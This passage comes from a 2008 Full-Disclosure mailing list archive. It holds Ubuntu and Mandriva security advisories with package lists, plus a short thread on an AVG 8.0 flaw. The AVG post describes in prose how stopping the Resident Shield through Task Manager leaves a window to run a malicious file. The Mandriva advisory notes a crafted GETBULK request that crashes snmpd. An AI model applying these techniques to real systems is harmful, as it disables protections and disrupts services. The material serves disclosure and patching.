    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    38126 107bd036a86295b765b865b592cae856
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   676982 b162978a3b55d0a7f3682ea28c23e2b2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   158454 aaf6ae3e6d430f7e06f71b398e2a7433
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    46404 52491f24cdfee2795758dd28ab1a8583
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   154016 054373c25e230ae6d2d7de5026c78aa8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   312610 033df8299f5c265367ea295c83165e3b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:  2596386 37ee7ec2a1d488e6f6de8f34176987f4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-7-generic_2.6.27-7.16_amd64.deb
      Size/MD5:   639082 ed8f3a70d90f169d172c6e173e0b6b1b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-7-server_2.6.27-7.16_amd64.deb
      Size/MD5:   638916 ffae21ca3ebd4400d503913ea9f08a77
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-7-generic_2.6.27-7.16_amd64.deb
      Size/MD5: 23022032 fd3e4e8ab005389ec0cc615cea22874d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-7-server_2.6.27-7.16_amd64.deb
      Size/MD5: 23010520 0b171157949ada26b8ba89d8e67ddc0e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-7-virtual_2.6.27-7.16_amd64.deb
      Size/MD5: 10436412 530186b8d1d7dc10e507e6bc452403ab
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-7.16_amd64.deb
      Size/MD5:   653232 f48b15dbf0ba532ccb97e22a7d3b4627
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   434628 bc318d4de2651e91305548666dead618
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   186306 c3ca7cc803a73d5aca4e0c80464d8274
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   275524 899bdf5de6963962c89b691eb26cd28d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:  1743146 5d9c0145c50ab7e0c51fbc0cef950834
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   151282 c02d1b6ef56dc28403beadad2bf88309
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   194184 66a2c1f8320659b94f6b90f119a9c964
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   167964 df927206736f4f2a8a7be1e7f013194f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    36454 e7312f2e6286590c1dbcbe5e7de35eeb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    83384 5d38ea1f3a73bad990ed52f66c7a7a28
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    71938 087964f10e908341f287ccea80e27008
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    23244 643c72067e2cb27c1ec228fc8d57e217
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:     9012 360892e9ef95ab6bd1dc90bb9e08249d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    68450 67e964ac3d95c5f4a1b12e6b271de74a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   110228 e18c86fcc58d390c4d2ad0e58fcb16a9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:  1275798 5242af32c6a8a1e38f31e7d8d8857644
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    47570 f8e459e40f399d1f966111122344504b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    13312 03eb83515fc5d90aeb272c540e165c6f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   391200 b7c4499c38f44e23908ef0fb63bdca45
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   198786 770b109f3971e9718fbeb2cc5f05c35d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    13578 dba0b8949f78e43c90545b7fd092c7b6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    33934 cfb49d89dd70429f2b730c7a2e8964b8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   244326 f8aedcc6ff1c95f0bacd870628bd34bd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    55394 ee8205b481dd6112058349957db14aa6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    41252 54cf9023f441a0699b3b380de4058160
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    48696 2e10bdbbd0be743e553bfd937ba44d9a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    86902 f5ed38f167db71b3601d1811a8b45a17
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    33940 2e90360f4470554283ebd7670cad3a57
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   674272 22f6dcac8dce84d5163d062bdf09460f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   158080 80298237cf5abe9f179750748d4858f4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    43708 d3135a501ea45cf5e18576c92cee7759
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   144930 abadde5392b98fcdb9d7ce8fa508f746
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   301938 1f69318efc172f2bdab1ca436471ea48
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:  2427088 0e03f701335f5379361ce51bec448626
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-7-generic_2.6.27-7.16_i386.deb
      Size/MD5:   620778 7228c2aa323fcf657c4d69263ea1821a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-7-server_2.6.27-7.16_i386.deb
      Size/MD5:   622006 75832cee4f8b79b1add067a274885c04
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-7-generic_2.6.27-7.16_i386.deb
      Size/MD5: 23398356 d5209ae17503b72ba9024f6ae5ba2a05
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-7-server_2.6.27-7.16_i386.deb
      Size/MD5: 23535584 4af9bab584739538dcb962c208cdd31d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-7-virtual_2.6.27-7.16_i386.deb
      Size/MD5: 10068962 55196eb464330b1376db54f0a93b9a04
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-7.16_i386.deb
      Size/MD5:   653202 18623f809fe95a1fce18d03b727d2f72
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   432650 7102e7cd30bddcc5c64c9949a3b00fc9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   170996 d1b2396fefe97dd11b56d0ab9b6bc8ef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   263918 70f6f3a4c7d11b3dc83e0ea3892a3b4c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:  1929778 484509b351a85edca959c0308251633e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   150870 2ffdb3d3586d260c172a4c2a10704d6d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   183920 b2b6944a79df8f5cfea8e864faff1a73
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   157516 88a61734f85432779c5437a3256aff7c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    34460 4a5bb06da997b163eabe8d2506276067
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    78194 e70a5b2735f1565acfd0dccdd42e02f9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    86118 2e8ca4c040d8c6f4a51f2064133b8d61
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    51170 c9fa04db1560010ef4c393a5a1e0ef08
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:     8792 4e53440551c157be34f48106cfccca38
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    64160 79f8e7c6a08ce1882215735cfd1846ee
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   101660 b3b6d533bbd7d88cf9bcad3cdc2dd8c8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:  1448942 8b58e86b771357133c686be093ec88e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    44504 9a83fcd3376f36a861c5d82f894e1041
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    12466 26fb29b1db43062d593f44bb69865785
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   370290 db295ecbc011997bb66d83c69006a1c1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:   187670 8ef20029cc61364b9df6c182da1dd8b8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-7-generic-di_2.6.27-7.16_i386.udeb
      Size/MD5:    12974 087166c052778fbe0c10e72cc9b3ffe8

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 235 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081105/296bd7d2/attachment.bin 

From tribalmp at gmail.com  Wed Nov  5 08:52:28 2008
From: tribalmp at gmail.com (Tribal MP)
Date: Wed, 5 Nov 2008 08:52:28 +0000
Subject: [Full-disclosure] AVG 8.0.173 flaw
Message-ID: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>

AVG 8.0.173 flaw
Nov 5, 2008

-- Affected Vendors:
AVG Technologies

-- Affected Products:
AVG 8.0.173

-- Vulnerability Details:
There is a flaw in AVG 8.0 that alow a user to shutdown the AVG
Resident Shield Service via Task Manager temporarily and execute a
malicious file while the AVG Resident Shield Service is restarting.

Note: The AVG Resident Shield Service can be crashed, until next boot.

-- Dificulty Level:
low

-- Vendor Response:
None

-- Disclosure Timeline:
2008-11-05 - Disclosure

-- About:
Fabio Pinheiro at http://dicas3000.blogspot.com



From admin at cyber-threats.com  Wed Nov  5 15:49:44 2008
From: admin at cyber-threats.com (alessandro telami)
Date: Wed, 5 Nov 2008 15:49:44 +0000
Subject: [Full-disclosure] AVG 8.0.173 flaw
In-Reply-To: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>
References: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>
Message-ID: <BAY131-W212DB5BC5D54392563E419D71F0@phx.gbl>


What sort of vulnerability would this be???> Date: Wed, 5 Nov 2008 08:52:28 +0000> From: tribalmp at gmail.com> To: full-disclosure at lists.grok.org.uk> Subject: [Full-disclosure] AVG 8.0.173 flaw> > AVG 8.0.173 flaw> Nov 5, 2008> > -- Affected Vendors:> AVG Technologies> > -- Affected Products:> AVG 8.0.173> > -- Vulnerability Details:> There is a flaw in AVG 8.0 that alow a user to shutdown the AVG> Resident Shield Service via Task Manager temporarily and execute a> malicious file while the AVG Resident Shield Service is restarting.> > Note: The AVG Resident Shield Service can be crashed, until next boot.> > -- Dificulty Level:> low> > -- Vendor Response:> None> > -- Disclosure Timeline:> 2008-11-05 - Disclosure> > -- About:> Fabio Pinheiro at http://dicas3000.blogspot.com> > _______________________________________________> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/
_________________________________________________________________
Win ?1000 John Lewis shopping sprees with BigSnapSearch.com
http://clk.atdmt.com/UKM/go/117442309/direct/01/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081105/afe5a61b/attachment.html 

From eharrison at gmail.com  Wed Nov  5 16:05:35 2008
From: eharrison at gmail.com (Erik Harrison)
Date: Wed, 5 Nov 2008 11:05:35 -0500
Subject: [Full-disclosure] AVG 8.0.173 flaw
In-Reply-To: <BAY131-W212DB5BC5D54392563E419D71F0@phx.gbl>
References: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>
	<BAY131-W212DB5BC5D54392563E419D71F0@phx.gbl>
Message-ID: <d8d979980811050805j4a6a148fg97f3a0f831e13d33@mail.gmail.com>

leveraging the same access credentials and attack vector, an attacker
could shut down the affected system without authorization.

oh shit. time to patch!

On Wed, Nov 5, 2008 at 10:49 AM, alessandro telami
<admin at cyber-threats.com> wrote:
> What sort of vulnerability would this be???
>
>> Date: Wed, 5 Nov 2008 08:52:28 +0000
>> From: tribalmp at gmail.com
>> To: full-disclosure at lists.grok.org.uk
>> Subject: [Full-disclosure] AVG 8.0.173 flaw
>>
>> AVG 8.0.173 flaw
>> Nov 5, 2008
>>
>> -- Affected Vendors:
>> AVG Technologies
>>
>> -- Affected Products:
>> AVG 8.0.173
>>
>> -- Vulnerability Details:
>> There is a flaw in AVG 8.0 that alow a user to shutdown the AVG
>> Resident Shield Service via Task Manager temporarily and execute a
>> malicious file while the AVG Resident Shield Service is restarting.
>>
>> Note: The AVG Resident Shield Service can be crashed, until next boot.
>>
>> -- Dificulty Level:
>> low
>>
>> -- Vendor Response:
>> None
>>
>> -- Disclosure Timeline:
>> 2008-11-05 - Disclosure
>>
>> -- About:
>> Fabio Pinheiro at http://dicas3000.blogspot.com
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ________________________________
> Get the best wallpapers on the Web - FREE. Click here!
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From kees at ubuntu.com  Wed Nov  5 18:19:56 2008
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 5 Nov 2008 10:19:56 -0800
Subject: [Full-disclosure] [USN-663-1] system-tools-backends regression
Message-ID: <20081105181956.GP9448@outflux.net>

===========================================================
Ubuntu Security Notice USN-663-1          November 05, 2008
system-tools-backends regression
https://launchpad.net/bugs/287134
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  system-tools-backends           2.6.0-1ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that passwords changed (or new users created) via the
"Users and Groups" tool were created with 3DES hashing.  This reduced the
security of stored user passwords, and was a regression from the correct
MD5 hashing.  This update fixes the problem; future password changes
will correct the hashing used.  We apologize for the inconvenience.


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/system-tools-backends/system-tools-backends_2.6.0-1ubuntu1.1.diff.gz
      Size/MD5:    11981 0a9e19e908466dca073aafdbca052e10
    http://security.ubuntu.com/ubuntu/pool/main/s/system-tools-backends/system-tools-backends_2.6.0-1ubuntu1.1.dsc
      Size/MD5:     1585 cc8c71def106ad81fa59c45bae82790d
    http://security.ubuntu.com/ubuntu/pool/main/s/system-tools-backends/system-tools-backends_2.6.0.orig.tar.gz
      Size/MD5:   567711 913530493fa6cff6e797f4c888641d42

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/s/system-tools-backends/system-tools-backends-dev_2.6.0-1ubuntu1.1_all.deb
      Size/MD5:    14022 b1ba12e53953c0ee1449a8605232fabb

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/s/system-tools-backends/system-tools-backends_2.6.0-1ubuntu1.1_amd64.deb
      Size/MD5:   113012 89e50d2b48202e6e5b4c2da8b06dff1c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/s/system-tools-backends/system-tools-backends_2.6.0-1ubuntu1.1_i386.deb
      Size/MD5:   111786 f4f2c2a8808320cde6b1ee8105550dec

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/s/system-tools-backends/system-tools-backends_2.6.0-1ubuntu1.1_lpia.deb
      Size/MD5:   111740 23882632c5460e7afbc3e04c6782c8dc

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/s/system-tools-backends/system-tools-backends_2.6.0-1ubuntu1.1_powerpc.deb
      Size/MD5:   114390 1fcb07972e510878a1cb8668efb26f5b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/s/system-tools-backends/system-tools-backends_2.6.0-1ubuntu1.1_sparc.deb
      Size/MD5:   112456 6e27917fa2fa9371f518e9f04cc34c6d

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 235 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081105/185b1db9/attachment.bin 

From nytrokiss at gmail.com  Wed Nov  5 20:12:45 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Wed, 5 Nov 2008 22:12:45 +0200
Subject: [Full-disclosure] AVG 8.0.173 flaw
In-Reply-To: <d8d979980811050805j4a6a148fg97f3a0f831e13d33@mail.gmail.com>
References: <40ca6f560811050052q1ded0e55l16cda954a9ba9e5a@mail.gmail.com>
	<BAY131-W212DB5BC5D54392563E419D71F0@phx.gbl>
	<d8d979980811050805j4a6a148fg97f3a0f831e13d33@mail.gmail.com>
Message-ID: <8a6b8e350811051212i6900029pbd823bf6578eaa18@mail.gmail.com>

For all people that use the free AVG "you get what you paid for" for all
else........

On Wed, Nov 5, 2008 at 6:05 PM, Erik Harrison <eharrison at gmail.com> wrote:

> leveraging the same access credentials and attack vector, an attacker
> could shut down the affected system without authorization.
>
> oh shit. time to patch!
>
> On Wed, Nov 5, 2008 at 10:49 AM, alessandro telami
> <admin at cyber-threats.com> wrote:
> > What sort of vulnerability would this be???
> >
> >> Date: Wed, 5 Nov 2008 08:52:28 +0000
> >> From: tribalmp at gmail.com
> >> To: full-disclosure at lists.grok.org.uk
> >> Subject: [Full-disclosure] AVG 8.0.173 flaw
> >>
> >> AVG 8.0.173 flaw
> >> Nov 5, 2008
> >>
> >> -- Affected Vendors:
> >> AVG Technologies
> >>
> >> -- Affected Products:
> >> AVG 8.0.173
> >>
> >> -- Vulnerability Details:
> >> There is a flaw in AVG 8.0 that alow a user to shutdown the AVG
> >> Resident Shield Service via Task Manager temporarily and execute a
> >> malicious file while the AVG Resident Shield Service is restarting.
> >>
> >> Note: The AVG Resident Shield Service can be crashed, until next boot.
> >>
> >> -- Dificulty Level:
> >> low
> >>
> >> -- Vendor Response:
> >> None
> >>
> >> -- Disclosure Timeline:
> >> 2008-11-05 - Disclosure
> >>
> >> -- About:
> >> Fabio Pinheiro at http://dicas3000.blogspot.com
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> > ________________________________
> > Get the best wallpapers on the Web - FREE. Click here!
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081105/8b9e94a3/attachment.html 

From security at mandriva.com  Wed Nov  5 20:30:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 05 Nov 2008 13:30:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:225 ] net-snmp
Message-ID: <E1Kxp0q-0002b1-Oe@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:225
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : net-snmp
 Date    : November 5, 2008
 Affected: 2008.0, 2008.1, 2009.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 A denial of service vulnerability was discovered in how Net-SNMP
 processed GETBULK requests.  A remote attacker with read access to
 the SNMP server could issue a specially-crafted request which would
 cause snmpd to crash (CVE-2008-4309).
 
 Please note that for this to be successfully exploited, an attacker
 must have read access to the SNMP server.  By default, the public
 community name grants read-only access, however it is recommended
 that the default community name be changed in production.
 
 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4309
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 63c576c59db3887c9ff46aea999af904  2008.0/i586/libnet-snmp15-5.4.1-1.2mdv2008.0.i586.rpm
 208783bde426bc2994b25eac38a2f6f6  2008.0/i586/libnet-snmp-devel-5.4.1-1.2mdv2008.0.i586.rpm
 68d9b48a792253fcb647cb44b024fc6a  2008.0/i586/libnet-snmp-static-devel-5.4.1-1.2mdv2008.0.i586.rpm
 837f701fa84fbf24f866332d374baea0  2008.0/i586/net-snmp-5.4.1-1.2mdv2008.0.i586.rpm
 6b8e3cde829e41e882a2bbde8f70e5c0  2008.0/i586/net-snmp-mibs-5.4.1-1.2mdv2008.0.i586.rpm
 9c8d0a70cd23f49af617ebd950ab913b  2008.0/i586/net-snmp-trapd-5.4.1-1.2mdv2008.0.i586.rpm
 27f9666d87ad5c63a170fa515c2cfb79  2008.0/i586/net-snmp-utils-5.4.1-1.2mdv2008.0.i586.rpm
 fa774042539e5fa60662ea26cf5f79bb  2008.0/i586/perl-NetSNMP-5.4.1-1.2mdv2008.0.i586.rpm 
 62fd3d953786bb45cc442069a9dbae14  2008.0/SRPMS/net-snmp-5.4.1-1.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 7862778bf4b9262707dae0101a051e84  2008.0/x86_64/lib64net-snmp15-5.4.1-1.2mdv2008.0.x86_64.rpm
 907423d895272503d6684a7f14618a97  2008.0/x86_64/lib64net-snmp-devel-5.4.1-1.2mdv2008.0.x86_64.rpm
 ba8972ac3af0a41754d7d830237be4a8  2008.0/x86_64/lib64net-snmp-static-devel-5.4.1-1.2mdv2008.0.x86_64.rpm
 2f8efd6d1db501439a1da8b205c3ba4b  2008.0/x86_64/net-snmp-5.4.1-1.2mdv2008.0.x86_64.rpm
 bd431f5a0c11b796223911463216d236  2008.0/x86_64/net-snmp-mibs-5.4.1-1.2mdv2008.0.x86_64.rpm
 929e4b2e24137d0aed30e012d2cbee25  2008.0/x86_64/net-snmp-trapd-5.4.1-1.2mdv2008.0.x86_64.rpm
 80679956f6b8e3f8095f1767d34cf7c7  2008.0/x86_64/net-snmp-utils-5.4.1-1.2mdv2008.0.x86_64.rpm
 f8c2af7b036a33dbadf22498933c90b5  2008.0/x86_64/perl-NetSNMP-5.4.1-1.2mdv2008.0.x86_64.rpm 
 62fd3d953786bb45cc442069a9dbae14  2008.0/SRPMS/net-snmp-5.4.1-1.2mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 aafe61f1aaaf2e13ef051fc1d7f5ab91  2008.1/i586/libnet-snmp15-5.4.1-5.2mdv2008.1.i586.rpm
 c7f2b5e4d5955a12b4df0fbf82f38544  2008.1/i586/libnet-snmp-devel-5.4.1-5.2mdv2008.1.i586.rpm
 f77c410069f938ae382fbee7012a349d  2008.1/i586/libnet-snmp-static-devel-5.4.1-5.2mdv2008.1.i586.rpm
 941b90ef50005b50829419575ab80ec1  2008.1/i586/net-snmp-5.4.1-5.2mdv2008.1.i586.rpm
 d8d459f3213cb97b2708c37c787a7035  2008.1/i586/net-snmp-mibs-5.4.1-5.2mdv2008.1.i586.rpm
 c753c1d4694d7b8c81f517c0c019accf  2008.1/i586/net-snmp-tkmib-5.4.1-5.2mdv2008.1.i586.rpm
 69a0f39e0366cda18fb3cb7440adf2c8  2008.1/i586/net-snmp-trapd-5.4.1-5.2mdv2008.1.i586.rpm
 825fe8ac0059480495d5f9f92b41775a  2008.1/i586/net-snmp-utils-5.4.1-5.2mdv2008.1.i586.rpm
 61b88005dba39bdad7c18c2774fab3ed  2008.1/i586/perl-NetSNMP-5.4.1-5.2mdv2008.1.i586.rpm 
